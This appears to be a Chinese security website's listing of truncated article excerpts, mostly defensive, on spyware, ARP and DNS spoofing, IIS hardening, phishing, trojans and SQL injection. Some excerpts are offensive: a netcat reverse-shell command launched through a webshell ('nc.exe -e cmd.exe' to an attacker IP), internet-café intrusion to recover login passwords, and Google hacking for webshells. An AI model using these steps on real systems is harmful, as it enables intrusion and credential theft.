所有人都面临间谍软件的威胁，特别是普通的网络用户。这些网络用户总是很快地点击弹出式对话框，按提示安装软件，接受垃圾邮件的馈赠或者浏览恶意的网站。　　最佳的预防措施就是对最终用户进行教育。但是，对于大多数人来说，这个事情已经太晚了，间谍软件已经在Windows工作站中疯狂地蔓延开了。为了帮助你识别和修复各种类型的间谍...

[阅读全文]

一.神秘的网络断流事件上了大学真“自由”，一切琐事都要自己打理，就连宿舍里的网络都要自己做……作为宿舍里唯一的技术员，这任务自然就落在我头上了。最终，我们宿舍靠着ZyXELSC642ADSLModem和TP-Link交换机的配合上了网，Modem方面我设置了路由和防火墙，宿舍内设置成一个对等网，一个学期下来平安无事。然...

[阅读全文]

错误引导——DNS欺骗临近过年，一辆长途客车满载着归家的旅人们在高速公路上行驶着，此时已是深夜，旅客们多半都已进入梦乡。司机发现前面不远处摆满了石块，还有一块指向告诉公路旁岔路口的牌子写着：“因前方公路塌方，严禁车辆通过，请绕道。”司机迟疑了一下，把车驶进了岔路。不远处，几双不安分的眼睛正在注视着客车……中间人攻击（M...

[阅读全文]

当垃圾邮件制造者想方设法将“垃圾”填入的电子邮件收件箱时，他们的对手——反垃圾邮件软件开发者一直在寻找方法阻止这种疯狂又无聊的行为。许多企业都在考虑采用应答反应(challenge-response)技术来解决这一棘手问题。　　这种新策略很简单，就是要求电子邮件发送者在发送无主题邮件时确认一下自己的身份，身份一旦确定，...

[阅读全文]

对于ARP欺骗，提出几点加强安全防范的措施。环境是主机或者网关是基于Linux/BSD的。一、理论前提　　本着“不冤枉好人，不放过一个坏人的原则”，先说说我的一些想法和理论依据。首先，大家肯定发送ARP欺骗包肯定是一个恶毒的程序自动发送的，正常的TCP/IP网络是不会有这样的错误包发送的(板砖扔了过来啊，废话！)。这就...

[阅读全文]

先分析入侵者都做了些什么！　　记得为了方便在他机器上装了RADMIN.登陆了一下.密码也不对了.看来是有人上去了.而且入侵者还拿到了系统管理员权限　　跑到机房.拿出ERDCOMMANDER.改了密码.重启，进入系统后第一步升级帐户.多了一个hud$的用户.administrators组.删除，再看guest用户虽然禁用...

[阅读全文]

<html><head><metahttp-equiv="Content-Type"content="text/html;charset=gb2312"><metaname="GENERATOR"content="MicrosoftFrontPage4.0"><metaname="ProgId"content="Fro...

[阅读全文]

防范这些WEBSHELL，首先是设置服务器的权限，禁止他们越权访问东西。服务器权限设置可以参考沉睡不醒整理的IISFAQ（http://fox.he100.com/showart.asp?art_id=121&cat_id=1），我这里就直接引用原文的内容了如何让iis的最小ntfs权限运行?　　依次做下面的工...

[阅读全文]

前言　　googlehacking其实并算不上什么新东西，在早几年我在一些国外站点上就看见过相关的介绍，但是由于当时并没有重视这种技术，认为最多就只是用来找找未改名的mdb或者别人留下的webshell什么的，并无太大实际用途。但是前段时间仔细啃了些资料才猛然发觉googlehacking其实并非如此简单...　　go...

[阅读全文]

据瑞星全球反病毒监测网介绍，今日有两个病毒特别值得注意，它们是：“白细胞（Worm.MSN.Acido）”和“隐藏（Hack.HideUser）”病毒。“白细胞”是通过MSNMessenger传播的蠕虫病毒，它会向所有的MSN好友发送诱惑性的网址链接，用户点击之后就会中毒。“隐藏”是一个黑客工具，它可以在用户机器中添加...

[阅读全文]

加强你网络中主机的防护利用这些策略防护你的网络周边用这些建议防护你的数据加强应用防护防止网络攻击什么是网络防护？首先，网络防护的概念显得过于宽泛笼统。但是在这个领域内没有什么是多余或者是过于笼统的。网络防护解决了包括网络之间联接的问题，把所有的网络联接成一个整个的网络。网络防护并不解决诸如外部防火墙或者拨号联接的问题，...

[阅读全文]

为了降低设计的复杂性，增强通用性和兼容性，计算机网络都设计成层次结构。这种分层体系使多种不同硬件系统和软件系统能够方便地连接到网络。管理员在分析和排查网络故障时，应充分利用网络这种分层的特点，快速准确地定位并排除故障。然而在实际故障排查过程中，这种分层方法往往被忽略，导致故障排查效率降低。　　两种逐层排查方式　　OSI...

[阅读全文]

首先，要求有网络的管理权限，普通用户没有权限修改网络设备的配置1配置交换机端口单地址工作模式防止IP盗用利用交换机提供功能，每个端口只允许一台主机通过该端口访问网络，如果下连HUB，则拒绝访问例：在Cisco2950系列交换机上的设置(其它厂商的设备原理类似）conftintfaste0/1portsecuremax-...

[阅读全文]

黑客在进行攻击时会借用其他系统来达到自己的目的，如对下一目标的攻击和被侵占计算机本身的利用等等。本文介绍了常见的黑客对被侵占计算机的使用方式和安全管理员相应的应对方法。黑客进行网络攻击时，除了自己手中直接操作的计算机外，往往在攻击进行时和完成之后利用、控制其他的计算机。他们或者是借此达到攻击的目的，或者是把这些计算机派...

[阅读全文]

微软的Windows密码安全性不是很高，这是事实，所以我也对以上各步骤不抱多少安全希望。可我还有一个好想法，那就隐藏驱动器。试想一下，虽然Jackeroo进入了Windows却看不到我们保存重要文件的驱动器，进入Windows又有什么用处呢？　　隐藏驱动器方法如下：在注册表的HKEY_CURRENT_USER\Soft...

[阅读全文]

一、IP地址盗用方法分析　　IP地址的盗用方法多种多样，其常用方法主要有以下几种：　　1、静态修改IP地址　　对于任何一个TCP/IP实现来说，IP地址都是其用户配置的必选项。如果用户在配置TCP/IP或修改TCP/IP配置时，使用的不是授权机构分配的IP地址，就形成了IP地址盗用。由于IP地址是一个逻辑地址，是一个需...

[阅读全文]

在黑客入侵寻找物件时，大多都使用Ping命令来检测主机，如果Ping不通，水平差的"黑客"大多就会知难而退。事实上，完全可以造成一种假相，即使我们线上，但对方Ping时也不能相通，这样就能躲避很多攻击。第一步:添加独立管理单元开始-运行，输入:mmc，启动打开"控制台"视窗。再点选"控制台"功能表下的"添加/删除管理单...

[阅读全文]

鉴别Unix系统是否被入侵，需要较高的技巧，当然也有一些非常简单的方法。简单的方法就是检查系统日志、进程表和文件系统，查看是否存在一些“奇怪的”消息、进程或者文件。例如：两个运行的inetd进程（应该只有一个）；.ssh以root的EUID运行而不是以root的UID运行；在“/”下的RPC服务的核心文件；新的setu...

[阅读全文]

导读--网络钓鱼(Phishing)一词，是“Fishing”和“Phone”的综合词，它利用欺骗性的E-mail和伪造的Web站点来进行诈骗活动，使受骗者泄露自己的重要数据，如信用卡号、用户名和口令等。　　_1.shtml"target=_self>　　几个月前，很多用户收到了一封貌似来自美国花旗银行的E-mail，...

[阅读全文]

蠕虫最近很"热"，没几天互联网上就来一次蠕虫浪潮，当然浪头有大有小，有的波涛汹涌，势不可挡，很快就波及整个世界，有的在一小片范围内翻了几翻就沉寂下去了。其实，这些都是表象，蠕虫真正的意义不在于其引起的浪头有多大，而在于是否实现了其目的。散播蠕虫的人的目的是什么呢？有很多种可能，可能是哪个所谓的黑客想提高自己在圈内的知名...

[阅读全文]

1.最基本，最常用的，测试物理网络的ping192.168.0.8－t，参数－t是等待用户去中断测试2.查看DNS、IP、Mac等A.Win98：winipcfgB.Win2000以上：Ipconfig/allC.NSLOOKUP：如查看河北的DNSC:\>nslookupDefaultServer:ns.hesjpt...

[阅读全文]

编者按：木马程序是一种程序，它能提供一些有用的，或是仅仅令人感兴趣的功能。但是它还有用户所不知道的其他功能，例如在你不了解的情况下拷贝文件或窃取你的密码。RFC1244(RequestforComments:1244)中是这样描述木马的：“木马程序是一种程序，它能提供一些有用的，或是仅仅令人感兴趣的功能。但是它还有用户...

[阅读全文]

什么是SQL指令植入式攻击？在设计或者维护Web网站时，你也许担心它们会受到某些卑鄙用户的恶意攻击。的确，如今的Web网站开发者们针对其站点所在操作系统平台或Web服务器的安全性而展开的讨论实在太多了。不错，IIS服务器的安全漏洞可能招致恶意攻击；但你的安全检查清单不应该仅仅有IIS安全性这一条。有些代码，它们通常是专...

[阅读全文]

1：首先，把C盘那个什么Inetpub目录彻底删掉，在D盘建一个Inetpub（要是你不放心用默认目录名也可以改一个名字，但是自己要记得）在IIS管理器中将主目录指向D:\Inetpub；其次，那个IIS安装时默认的什么scripts等虚拟目录一概删除如果你需要什么权限的目录可以自己慢慢建，需要什么权限开什么。（特别注...

[阅读全文]

局域网中IP地址被占用或篡改的情况时有发生,为你提供几个实用招数。　　停用网络连接服务　　要限制用户随意修改TCP/IP参数，最简单的方法是让用户无法打开TCP/IP参数设置窗口。打开“开始”中“运行”输入“services.msc”命令，选中“NetworkConnections”服务，右键单击，从属性中选择其中的停...

[阅读全文]

网络的流行，让我们的世界变得更加美好，但它也有让人不愉快的时候。当您收到一封主题为“ILoveYou”的邮件，用兴奋得几乎快发抖的鼠标去点击附件的时候；当您浏览一个信任的网站之后，发现打开每个文件夹的速度非常慢的时候，您是否察觉病毒已经闯进了您的世界呢？2000年5月4日欧美爆发的“宏病毒”网络蠕虫病毒。由于通过电子邮...

[阅读全文]

随着Internet的发展，Web技术日新月异。继通用网关接口（CGI）之后，“ASP”(ActiveServerPages)作为一种典型的服务器端网页设计技术，被广泛地应用在网上银行、电子商务、搜索引擎等各种互联网应用中。同时Access数据库作为微软推出的以标准JET为引擎的桌面型数据库系统，由于具有操作简单、界面...

[阅读全文]

　　一.网吧入侵　　入侵的方法很多，但对网吧入侵最常用的方法是什么呢？首先，自动登陆。现在网吧一般都是win2000或者windowsxp的机器，网管一般都把机子设置为自动登陆！　　这样我们开机进入系统的时候登陆窗口一闪而过！着时候如果我们findfass.exe试图把登陆账号密码找出来是不会成功的！因为账号密码根本不...

[阅读全文]

1.用NC反弹得到一个shell本机监听NC-l-p32WEBSHELL运行：x:\xxx\serv-u.exe"x:\xxx\nc.exe-ecmd.exe*.*.*.*port"得到一个shell2.CMD下导出注册表文件C:\>regedit-ex:\xxx\1.regHKEY_LOCAL_MACHINE\SYS...

[阅读全文]

　谈到网络安全，你可能熟悉网页欺诈的危险，但是知道域欺骗(pharming)威胁吗?对于一家在线公司来说，这种风险是致命的!　　简单来说，域欺骗就是把原本准备访问某网站的用户，在不知不觉中，劫持到仿冒的网站上，例如用户准备访问某家知名品牌的网上商店，黑客就可以通过域欺骗的手段，把其带到假的网上商店，同时收集用户的ID信...

[阅读全文]